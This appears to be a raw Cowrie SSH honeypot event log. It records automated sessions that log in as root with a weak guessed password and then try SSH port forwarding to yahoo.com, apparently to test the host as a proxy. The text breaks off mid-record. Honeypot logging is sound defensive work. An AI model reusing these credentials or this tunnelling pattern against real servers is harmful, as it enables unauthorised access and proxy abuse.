{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.105438Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47146,"dst_ip":"1.2.3.4","dst_port":22,"session":"918027cf7600","protocol":"ssh","message":"New connection: 213.209.150.239:47146 (1.2.3.4:22) [session: 918027cf7600]","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.151451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.152987Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.199890Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.434164Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":19963,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19963","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.482147Z","session":"918027cf7600"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.530012Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9131,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9131","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.665483Z","session":"918027cf7600"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.712748Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.761237Z","src_ip":"213.209.150.239","session":"918027cf7600"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47198,"dst_ip":"1.2.3.4","dst_port":22,"session":"19c128ebd754","protocol":"ssh","message":"New connection: 213.209.150.239:47198 (1.2.3.4:22) [session: 19c128ebd754]","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.817166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.818012Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.874773Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.157414Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32085,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32085","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.215044Z","session":"19c128ebd754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.271820Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":15145,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15145","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.427160Z","session":"19c128ebd754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.483973Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.541402Z","src_ip":"213.209.150.239","session":"19c128ebd754"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47281,"dst_ip":"1.2.3.4","dst_port":22,"session":"245fd562fe1c","protocol":"ssh","message":"New connection: 213.209.150.239:47281 (1.2.3.4:22) [session: 245fd562fe1c]","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.587605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.588283Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.635759Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.870403Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9669,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9669","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.919078Z","session":"245fd562fe1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:24.966261Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2391,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2391","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.101441Z","session":"245fd562fe1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.148676Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.196759Z","src_ip":"213.209.150.239","session":"245fd562fe1c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47354,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5e96be1388e","protocol":"ssh","message":"New connection: 213.209.150.239:47354 (1.2.3.4:22) [session: f5e96be1388e]","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.252609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.262880Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.309435Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.592611Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26282,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26282","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.650152Z","session":"f5e96be1388e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.706940Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20907,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20907","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.863336Z","session":"f5e96be1388e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.920054Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:25.977604Z","src_ip":"213.209.150.239","session":"f5e96be1388e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47420,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b53b32cb43e","protocol":"ssh","message":"New connection: 213.209.150.239:47420 (1.2.3.4:22) [session: 4b53b32cb43e]","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.033026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.034179Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.090583Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.372408Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4410,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4410","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.429808Z","session":"4b53b32cb43e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.486321Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29236,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29236","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.643004Z","session":"4b53b32cb43e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.699591Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.757438Z","src_ip":"213.209.150.239","session":"4b53b32cb43e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47492,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff6eb34c8f3","protocol":"ssh","message":"New connection: 213.209.150.239:47492 (1.2.3.4:22) [session: bff6eb34c8f3]","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.813268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.813930Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ss